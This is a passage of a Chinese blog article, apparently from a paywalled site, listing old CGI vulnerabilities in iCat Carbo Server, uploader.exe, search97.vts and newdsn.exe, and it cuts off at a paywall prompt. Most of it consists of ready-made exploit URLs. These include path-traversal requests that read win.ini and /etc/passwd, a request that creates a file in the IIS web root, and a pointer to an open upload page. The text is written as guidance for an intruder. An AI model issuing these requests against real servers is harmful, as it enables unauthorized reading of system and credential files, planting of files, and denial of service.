本文详细介绍了针对CGI漏洞的各种攻击手段,包括利用iCat Carbo Server、uploader.exe、search97.vts、newdsn.exe等工具进行文件查看、上传和DoS攻击。同时,还提到了shtml.dll、shtml.exe等组件的漏洞,以及如何通过queryhit.htm、点点攻击等方式获取敏感信息。这些攻击方法揭示了服务器,尤其是IIS和Unix系统中的安全风险。
1.carbo.dll
iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
攻击方法:
提交这样的http请求 :
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
http会做如下回应:
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
Error: (-1007) cannot open file 'C:/web/carbohome/file_to_view.htm'
查看win.ini文件: c:/winnt/win.ini:
http://host/carbo.dll?icatcommand=../../winnt/win.ini&catalogname=catalog
____________________________________________________________________________________
2.uploader.exe
如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
攻击方法: http://host/cgi-win/uploader.exe
会带你到上传页面,剩下的事就不用我告诉你了把?:)
____________________________________________________________________________________
3.search97.vts
这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
攻击方法: http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books
____________________________________________________________________________________
4.newdsn.exe
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外,在某些特定条件下,利用newdsn.exe可能使IIS遭受拒绝服务攻击,如果攻击成功,将导致IIS停止响应连接请求。
攻击方法:
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
2. D.o.s攻击:提交下列连接请求:
http://www.example.com/Scripts
最低0.47元/天 解锁文章
扫一扫
4703
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
